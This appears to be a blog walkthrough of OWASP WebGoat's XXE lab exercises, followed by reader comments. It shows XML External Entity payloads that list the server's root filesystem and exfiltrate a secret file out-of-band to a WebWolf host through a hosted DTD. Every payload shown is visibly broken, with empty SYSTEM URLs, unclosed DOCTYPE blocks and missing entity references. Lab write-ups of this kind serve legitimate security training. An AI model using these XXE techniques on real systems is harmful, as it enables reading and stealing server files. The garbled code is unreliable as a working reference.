The WebGoat XXE (XML External Entity) section has 3 exercises. The first 2 are pretty easy, the last one quite difficult.
So without further ado, let’s get to it!

Exercise 3

In this exercise you are asked to list the contents of the root file system directly in a comment using XXE. For this, you can use the SYSTEM “file://” entity, as follows:

<?xml version=”1.0″?>
<!DOCTYPE comment [
<!ENTITY xxe SYSTEM “file:///”>

Intercept the request with a proxy and change the POST data to the above. This works on Linux systems, for Windows you should list the contents of C:/ instead of /.

Exercise 4

This one is very simple, do the same as above but with a twist. Initially, the data is sent by JSON not XML. Just change the Content-Type to application/xml in the header.

Page 6

This is not really an exercise, but since the tutorial is full of errors and you have to get it working correctly before trying the next exercise, I have included it.
You are asked to ping the landing page of WebWolf with the test=HelloWorld parameters, using the following attack.dtd file uploaded to WebWolf:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!ENTITY ping SYSTEM ‘’>

It is important to go to ip:port/landing, NOT ip:port/WebWolf/landing as the tutorial says! Trying to go to /WebWolf/landing constantly returned the error Scanner State 24, which didn’t make much sense. Also, don’t forget to send the parameters, the tutorial doesn’t mention this.

Exercise 7

This exercise builds upon the example on page 6, so it’s important to get that to work first. This time, you are supposed to ping the landing page of WebWolf with the contents of a secret file from the server system. You should do this with an attack file hosted on WebWolf, not listing the file in the comment section of WebGoat (which is much easier).

First, construct and upload the contents_file.dtd to WebWolf:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!ENTITY % all “<!ENTITY send SYSTEM ‘;’>”>%all;

This pings /landing with the file parameter which we’ll specify later, allowing you to see its contents in WebWolf (Incoming Requests).
Again, write a comment in WebGoat and intercept the POST, changing it to the following:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE xxe [
<!ENTITY % file SYSTEM “file:///home/tux/.webgoat-8.0.0.M21/XXE/secret.txt”>
<!ENTITY % dtd SYSTEM “”>

This command does two things: reads the secret.txt file and allows it to be referenced as %file; and opens the contents_file.dtd on the WebWolf server, which then pings itself with the contents of %file;.
Now go to Incoming Requests in WebWolf, look at the latest record and copy the parameter (removing URL encoded spaces). Post this message in WebGoat under the cute cat, and you should have solved the exercise!

3 thoughts on “OWASP WebGoat XXE”

  1. Jeffrey Penner

    Hello guru,

    I am still quite confused on your explanation of Page 6. Unfortunately, the site itself is terribly hard to read and I’m not given enough information from your post. Could you please explain better which call to intercept within ZAP and how to ping the landing page. I am assuming that we upload a file named attack.dtd with the following content:

    Unfortunately, that is likely the only thing I got right here.

    Please explain when you have a chance.


  2. Hello,

    This is a nice solution. However, I have one question for Exercise 7: Why do we need to wrap the ‘send’ entity inside ‘all’ entity? Can’t we just use general entities? Is it that the ‘file’ entity contents will be sent in the URL only if we use parameter entities?

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